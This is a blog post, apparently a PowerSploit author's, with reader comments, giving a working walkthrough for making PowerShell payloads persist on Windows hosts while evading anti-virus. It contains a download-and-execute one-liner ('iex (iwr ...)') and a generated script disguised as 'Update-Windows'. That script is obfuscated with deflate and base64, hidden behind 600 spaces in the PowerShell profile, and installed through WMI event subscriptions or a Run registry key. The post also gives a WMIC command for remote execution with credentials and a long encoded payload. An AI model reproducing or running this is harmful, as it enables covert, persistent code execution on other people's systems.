Exploit Monday: Practical Persistence with PowerShell

Download: Persistence Module

As I've preached continuously, PowerShell is the ideal post-exploitation tool in a Windows environment. A PowerShell-based payload can accomplish the same tasks of any compiled payload all without fear of flagging anti-virus. Unfortunately, PowerShell offers no built in method of persisting your payloads. PowerShell v3 introduced a scheduled tasks module but obviously, this only works with v3 and you're out of luck if you want to persist via any other method.

I developed a persistence module for PowerShell that solves the challenges of persisting scripts once and for all. The module adds persistence capabilities to any PowerShell script. Upon persisting, the script will strip out its persistence logic.

Generating a persistent script is relatively straightforward:

1) Drop the 'Persistence' folder into your module directory (usually $Env:HomeDrive$Env:HOMEPATH\Documents\WindowsPowerShell\Modules) or just install the entire PowerSploit module.

2) Import the 'Persistence' module

Import-Module Persistence

3) Create your payload. This can come in the form of a scriptblock or a ps1 file. In this example, I'll be using a scriptblock consisting of a rickroll payload. ;D

$Rickroll = { iex (iwr http://bit.ly/e0Mw9w ) }

4) Specify the desired limited-user persistence options:

$UserOptions = New-UserPersistenceOptions -Registry -AtLogon

5) Specify the desired elevated persistence options:

$ElevatedOptions = New-ElevatedPersistenceOptions -PermanentWMI -Daily -At '3 PM'

6) Apply the persistence options to the rockroll payload. A persistence and removal script will be generated:

Add-Persistence -ScriptBlock $Rickroll -ElevatedPersistenceOptions $ElevatedOptions -UserPersistenceOptions $UserOptions -PassThru -Verbose

6a) Optionally, create a one-liner out of the generated persistence script (requires the full PowerSploit module):

Add-Persistence -ScriptBlock $Rickroll -ElevatedPersistenceOptions $ElevatedOptions -UserPersistenceOptions $UserOptions -PassThru -Verbose |
Out-EncodedCommand | Out-File .\EncodedPersistentScript.ps1

7) The generated script will look like this:

function Update-Windows{
Param([Switch]$Persist)
$ErrorActionPreference='SilentlyContinue'
$Script={sal a New-Object;iex(a IO.StreamReader((a IO.Compression.DeflateStream([IO.MemoryStream][Convert]::FromBase64String('U8hMrVDQyCwvUsgoKSmw0tdPyizRy6nUTzXwLbcsV9BUAAA='),[IO.Compression.CompressionMode]::Decompress)),[Text.Encoding]::ASCII)).ReadToEnd()}
if($Persist){
if(([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole]'Administrator'))
{$Payload="`$Filter=Set-WmiInstance -Class __EventFilter -Namespace `"root\subscription`" -Arguments @{name='Updater';EventNameSpace='root\CimV2';QueryLanguage=`"WQL`";Query=`"SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_LocalTime' AND TargetInstance.Hour = 15 AND TargetInstance.Minute = 00 GROUP WITHIN 60`"};`$Consumer=Set-WmiInstance -Namespace `"root\subscription`" -Class 'CommandLineEventConsumer' -Arguments @{ name='Updater';CommandLineTemplate=`"`$(`$Env:SystemRoot)\System32\WindowsPowerShell\v1.0\powershell.exe -NonInteractive`";RunInteractively='false'};Set-WmiInstance -Namespace `"root\subscription`" -Class __FilterToConsumerBinding -Arguments @{Filter=`$Filter;Consumer=`$Consumer} | Out-Null"}
else
{$Payload='New-ItemProperty -Path HKCU:Software\Microsoft\Windows\CurrentVersion\Run\ -Name Updater -PropertyType String -Value "`"$($Env:SystemRoot)\System32\WindowsPowerShell\v1.0\powershell.exe`" -NonInteractive -WindowStyle Hidden"'}
' '*600+$Script.ToString()|Out-File $PROFILE.CurrentUserAllHosts -Append -NoClobber -Force
iex $Payload|Out-Null
Write-Output $Payload}
else
{$Script.Invoke()}
} Update-Windows -Persist

8) Deploy the payload. In my example, I will execute the persistent payload remotely using WMIC and the encoded one-liner I generated:

wmic /USER:"CorpNet\JoeUser" /PASSWORD:"password123" /NODE:10.10.0.19 process call create "powershell -EncodedCommand 'cwBhAGwAIABhACAATgBlAHcALQBPAGIAagBlAGMAdAA7AGkAZQB4ACgAYQAgAEkATwAuAFMAdAByAGUAYQBtAFIAZQBhAGQAZQByACgAKABhACAASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4ARABlAGYAbABhAHQAZQBTAHQAcgBlAGEAbQAoAFsASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AXQBbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACcAcABWAFYAdABiACsASgBHAEUAUAA2AE8AeABIADkAWQBJAFMAVABEAHQAYgBhADQAWABCAHUAMQBRAFUAaAAxAEMAQgB6AFcAOABSAFoAcwBvAEYASwBJAFkATABFAEgAcwB1ADEANgAxADkAcABkAFEAMwB3AGsALwA3ADEAagBEAEwAawBrAE8AbAAyAGwAOQBwAHQAbgBaADMAYQBlAG0AVwBkAG0ASAA1AGQATABtADEAUwBFAGgAawBsAEIAcABrAGwARQBEAGQAaAB6AEoAaQBLADUAMQA0AGQAeQBhAFUAdwBWAGoAVwB0ADMALwBwADYAWgA4AE8ARwArAE8AZwBhAGwAbQBUAGIAMQBjAHEAbgBhAFUAVQBvAHEAOQAzAGgAdAByAEcAQQBEAEMAawBRAEkATABjAHQAbgBIAEkAVABoAFcAVgBzAEsAdwAwAFEASwBGAG8AYgA2AG8AVwBLAEoAYQBSADAAMAA1AFkAUwBTAEkAZQB6AHQAMABmAG8AdgBDAEUAMgBUAHcAVwBPAE4ARQBtAC8AawArAEUAWQBCAGoAUwBkAEEASQAxAEMAMQA0AHEAZwB0ADQAMABTAEIAMQBwAGoAZgB1AFkARQBOAHgANwBxAEsAcQBOAG8AZABlAGcAYwBRAFMANQBVAFYAQgAvAGQAMwBDAEwAWQBEAFoAZQA2AHYAcgByAHAASwB4AHQAZABVAHcAKwBVAHYANgBHAE4AaQBXADcATwBtAHYAegAwAE0AMQBPAHoAbQBOAG0AdgB2AGQAMQBPADkAbABWAC8AOABlAE4AOAB3ADAAVABoAGoAWAB5AGYAWgBwAFoAZwBHAFgALwAvAGMAOQA5AGUAaABuAHYAMQArAFAAWABWAGQAdAAyAFgAVgBmADcANQA3AEIALwAvAHEAZQB5AEEAagBRAEoAZwBiAEMARQA5AG4AZABRAHcAUAA0AE4ARQA0AEgAUgBIAEsAQwBCAEgAUgA2AC8AcAB0AHoANgB2AFgAbgBiAHkAZgBRAEgAWgBFAFYASwBzAC8AbAAwAHQAcwBVADMAdgBoADcAMwBBADAAawBWAGMASQBVADgAVgBNADUAbwB5AHgAMgBKAEEAbABsAEQAcwBuADcAbAA4AE8ANwBuADgAUQA1AEUAWABJAE4AWABvAFEAOAB6AE8AWQBkAHEAcAB3AEMASwBhAEcAeQBKADcAMgB4AEUAUgB5ACsAQgBIAEMAZABjAHEANABLAGMATAB1AEwAVABlAEsAbQBjAEQASwBGAEQAVgBTAFcAWABVAGMAOABLAEUANgBwAGgAbQBYAE4ARwBwAFYAVgB0AFUAdQBoAG8ASgBxACsAVwBEAHMAZQBjAHcAOABvAFEAMwBGAGEAUgBPADcAegBhAG4AVwBaAEwAbgBzADcAQgBDADQAQwBDAEwAMgBrAE0AYQBnAEUANAByACsAVgBVAFYASgBhAFIAWQA2AFgAZQB2AGoAQwBpAEMAQgBxAHcAcQB4AFgAYgBWAE4AWQA3AHkAZwB5AFIAOABIAGcAYwBFAHQAcQA5AGcANwBaAFQAVwBQAGkAZgBJAEUAZgBwADYAZwBaAFIAMwB2AHQAMQBrADgAdQA3AEMAYQB0AHkAbQBvAHIARQAvAEYATgBxAFYAYgBhAEsAMABxADgAOQB2ACsAcQBsAEsAYwBvAHUAVgAzACsAcAAxADIAUQBEADYAUQA3AG0AUQAwAHcASgBMAE8AUgBlAEwARQAyAEkAYQBGAE4AQQBjAC8AWgBpAGQAegBMACsAaAA1AFEAMwBMAFoASQBQAE4AZQBaADkASQBoAEEAVgBWAGIATQBDADkATgBlAGIANQBMAEwATwBUAG8AMAA4AFcAeQBMADAAUABLAEEAeABhAEQAUgBkAHoAaAB6AGIAdABBAHAAeQBkAFQAUgBWAHIAawA0ADYALwBmAGMAdwA1AHcAKwBRADIAZwB1ADkARQBnAG4AeQBlAGoANgBmAGcAYgA3AEsAcgB5ADMARgB4AFYAYwBXAGMAMQBzAHYAQQBkAFUAdgArAFYAdgA0AEoAMQBDADkAYwB5AHAAaQBMAHEATQB3AEgASAB4AHMANABaAHIAYgBjAE0AawAzAGMAVQB2ADcAbwBXAFEASgB6AGsARAB3AHYAcABXADEAVgByAHEAMgBwAEgANwBLADcAOABUAEIAdQBJAEoANABoAGIAWAB4AFQAZgBuAHkANABXADUANgBXAFUAZQAxAEQAKwBBADMAQwArADIASAAxADAARwBvAHMAawB0ADMAVgB1AE8ALwBDAFkAVgB5ADYARgBKAHgAQwBFAG8AaQB6AHMAQQBJAGMAegBTAFYAOABmADgASwB4AGwAYgBTAGoAWABZAEQAMAAzAC8AMgB2AFgAeQAyAFcAeABaAG8ARQA4AHQAMwB1AE4AdABlAEcANwBlADkAdgAwAGEAVwBIAFAAbQA5AHQAOABZAGYAcwBiADgAYwAvAGsAaQBZAHgAUwBZAHcAOQBUAHoAaQB2ADQAUABnAEUATABlADcAMwAyAFYAaQA1AFUASAB2AFkALwBWAGoASgBCAGQAYwBtAEkAUABhAGIAbQBnAGYAUwArAHQASwBkAFgAdgB0AHkAWQBQAFYAVwB3AEcATABCAFEAUwBZADMAVwBtAGEAUABGADYAUgBuAE8AOABxAGMAdQB4AFEASQBwAFcAQgBUAGQAbgBkAFEAVgBYADgAZwA1AFkANQBBAGwAUQBBAHEAaABJAHYAYQBNADgAaABSAEkAWgBWAFcAcAAxAHYANwBuAEkASABLADIAMwBvADYAQwBuAEMAVABkAE4AeABrAEgAMABtAE0AUgBDAGsAZgBGAHcAcQBZAHQAWQBuADIANABiAEQAUgArAE8AbQBtADAARQA4AGkAVABiAHQAYQBmAGMAbQA2AFEAUABTAEQAVgA4AFcAVABVADkAZgBvAGQANQA5AFQAWgBWAEkATgB5AE8AZQA5AEoAagBWAFQAYgBiAHAASwBBAGkASABMAEEATgBwAGYAcgBkAGQANQBlAFYANgBvAFEAcQBVAFIAMQBKADIAYwAyAG4AOAA1AE0AbAAwAHQAegBsAEMATwB3ADAAVQA1AFMAOAArAEoALwB4AGYAKwBwAEUAawAvAHMANQBOADkAdwBWAE0ANwBuAGQALwA4AGwASgBMAEQAUQAwAFgASwBwAFgAUABvAEgAJwApACwAWwBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ATQBvAGQAZQBdADoAOgBEAGUAYwBvAG0AcAByAGUAcwBzACkAKQAsAFsAVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkAKQApAC4AUgBlAGEAZABUAG8ARQBuAGQAKAApAA=='"

9) The payload has now persisted on the target machine. Sit back and let the hilarity ensue.

8 comments:

AnonymousApril 5, 2013 at 8:11 AM
awesome! going to go play with this!
AnonymousOctober 28, 2014 at 6:41 PM
It would be great if you could offer that PPT presentation as downloadable -- whatever formatting is happening between Blogger and my version of Chrome is making it difficult to navigate/read.
AnonymousNovember 2, 2014 at 11:13 PM
Any chance of a proxy parameter in a future update?
AnonymousNovember 16, 2014 at 11:35 PM
1st, thanks for providing Powersploit,

The persistence module is generating errors following the examples in your post and the get-help examples. This is running on a win7 host with PowerShell v3 and PowerSploit loaded in the system Modules directory.

There are several errors below, but "Access to the path 'C:\users\bob' is denied" is odd. Usually this error is when the folder is specified but not the file or filename. I get this error if I specify the full path aka -FilePath C:\Users\Bob\MyEvilScript.ps1 OR if I use -FilePath .\MyEvilScript.ps1

C:\Users\Bob>powershell -nop -ep bypass
Windows PowerShell
Copyright (C) 2012 Microsoft Corporation. All rights reserved.

PS C:\Users\Bob> Import-Module PowerSploit
PS C:\Users\Bob> $ElevatedOptions = New-ElevatedPersistenceOption -PermanentWMI -Daily -At '11 PM'
PS C:\Users\Bob> $UserOptions = New-UserPersistenceOption -Registry -AtLogon
PS C:\Users\Bob> Add-Persistence -FilePath .\MyEvilScript.ps1 -ElevatedPersistenceOption $ElevatedOptions -UserPersistenceOption $UserOptions -Passthru -Verbose | Out-EncodedCommand | Out-File .\EncodedPersistentScript.ps1

Out-EncodedCommand : The input object cannot be bound to any parameters for the command either because the command does not take pipeline input or the input
and its properties do not match any of the parameters that take pipeline input.
At line:1 char:147
+ ... hru -Verbose | Out-EncodedCommand | Out-File .\EncodedPersistentScript.ps1
+ ~~~~~~~~~~~~~~~~~~
+ CategoryInfo : InvalidArgument: (C:\Users\Bob\MyEvilScript.ps1:PSObject) [Out-EncodedCommand], ParameterBindingException
+ FullyQualifiedErrorId : InputObjectNotBound,Out-EncodedCommand

Exception calling "ReadAllText" with "1" argument(s): "Access to the path 'C:\Users\Bob' is denied."
At C:\Windows\system32\WindowsPowerShell\v1.0\Modules\PowerSploit\Persistence\Persistence.psm1:477 char:9
+ $Script = [IO.File]::ReadAllText((Resolve-Path $Path))
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : NotSpecified: (:) [], MethodInvocationException
+ FullyQualifiedErrorId : UnauthorizedAccessException

Exception calling "GetBytes" with "1" argument(s): "Array cannot be null.
Parameter name: chars"
At C:\Windows\system32\WindowsPowerShell\v1.0\Modules\PowerSploit\Persistence\Persistence.psm1:501 char:5
+ $ScriptBytes = ([Text.Encoding]::ASCII).GetBytes($Script)
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : NotSpecified: (:) [], MethodInvocationException
+ FullyQualifiedErrorId : ArgumentNullException

Property 'Length' cannot be found on this object. Make sure that it exists.
At C:\Windows\system32\WindowsPowerShell\v1.0\Modules\PowerSploit\Persistence\Persistence.psm1:504 char:5
+ $DeflateStream.Write($ScriptBytes, 0, $ScriptBytes.Length)
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : NotSpecified: (:) [], PropertyNotFoundException
+ FullyQualifiedErrorId : PropertyNotFoundStrict

VERBOSE: Persistence script written to C:\Users\Bob\Persistence.ps1
VERBOSE: Persistence removal script written to C:\Users\Bob\RemovePersistence.ps1

Do you have any suggestions?

Thursday, April 4, 2013

Practical Persistence with PowerShell

8 comments: